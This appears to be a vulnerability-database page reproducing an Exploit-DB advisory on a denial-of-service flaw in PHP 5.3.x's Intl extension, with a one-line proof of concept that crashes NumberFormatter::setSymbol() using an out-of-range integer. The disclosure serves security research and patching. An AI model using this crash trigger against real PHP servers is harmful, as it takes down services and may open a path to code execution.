Lucene search

K

PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Denial of Service

🗓️ 10 Mar 2011 00:00:00Reported by thogerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

PHP 5.3.x 'Intl' Extension remote denial-of-service vulnerabilit

Show more
Related
Code
source: https://www.securityfocus.com/bid/46968/info

PHP is prone to a remote denial-of-service vulnerability that affects the 'Intl' extension.

Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed.

PHP versions prior to 5.3.6 are vulnerable.

numfmt_set_symbol(numfmt_create("en", NumberFormatter::PATTERN_DECIMAL), 2147483648, "") 

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo